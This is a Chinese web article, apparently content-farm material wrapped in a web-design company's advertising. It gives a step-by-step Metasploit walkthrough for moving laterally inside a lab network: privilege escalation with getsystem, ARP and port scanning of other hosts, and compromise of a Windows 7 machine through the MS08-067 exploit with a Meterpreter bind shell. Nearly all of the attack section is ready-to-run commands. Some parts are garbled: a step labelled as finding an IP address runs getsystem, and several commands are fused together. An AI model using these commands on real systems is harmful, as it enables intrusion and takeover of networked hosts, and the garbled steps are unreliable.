大數(shù)據(jù)中如何獲取內(nèi)網(wǎng)中其他主機(jī)權(quán)限，針對(duì)這個(gè)問題，這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答，希望可以幫助更多想解決這個(gè)問題的小伙伴找到更簡(jiǎn)單易行的方法。

創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于成都網(wǎng)站制作、成都網(wǎng)站設(shè)計(jì)、貢嘎網(wǎng)絡(luò)推廣、微信平臺(tái)小程序開發(fā)、貢嘎網(wǎng)絡(luò)營(yíng)銷、貢嘎企業(yè)策劃、貢嘎品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營(yíng)等，從售前售中售后，我們都將竭誠(chéng)為您服務(wù)，您的肯定，是我們最大的嘉獎(jiǎng)；創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供貢嘎建站搭建服務(wù)，24小時(shí)服務(wù)熱線：028-86922220，官方網(wǎng)址：www.cdcxhl.com

環(huán)境：小攻：Kali 2020，ip：192.168.1.133

          小受：win7 x86，ip：192.168.1.144

          小小受：win7 x64 ，ip:  192.168.1.130

一、生成木馬及監(jiān)聽主機(jī)參考上篇文章：

內(nèi)網(wǎng)滲透 -- 提升權(quán)限(利用提權(quán)漏洞)

二、獲取小受的IP地址

meterpreter > getsystem

三、獲取內(nèi)網(wǎng)中存活的主機(jī),以一臺(tái)win03主機(jī)為例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

四、端口掃描，看看小小受開放了那些端口

1、選擇用到的模塊：

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的參數(shù)：

show options

3、設(shè)置要掃描的端口：

msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、設(shè)置小小受ip地址：

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、執(zhí)行：

msf5 auxiliary(scanner/portscan/tcp) > run

五、利用ms08_067漏洞拿下小小受   

1、搜索ms08_067模塊信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、選擇該模塊并設(shè)置payload

msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的參數(shù)：

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、設(shè)置目標(biāo)主機(jī)并執(zhí)行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130msf5 exploit(windows/smb/ms08_067_netapi) > run

關(guān)于大數(shù)據(jù)中如何獲取內(nèi)網(wǎng)中其他主機(jī)權(quán)限問題的解答就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識(shí)。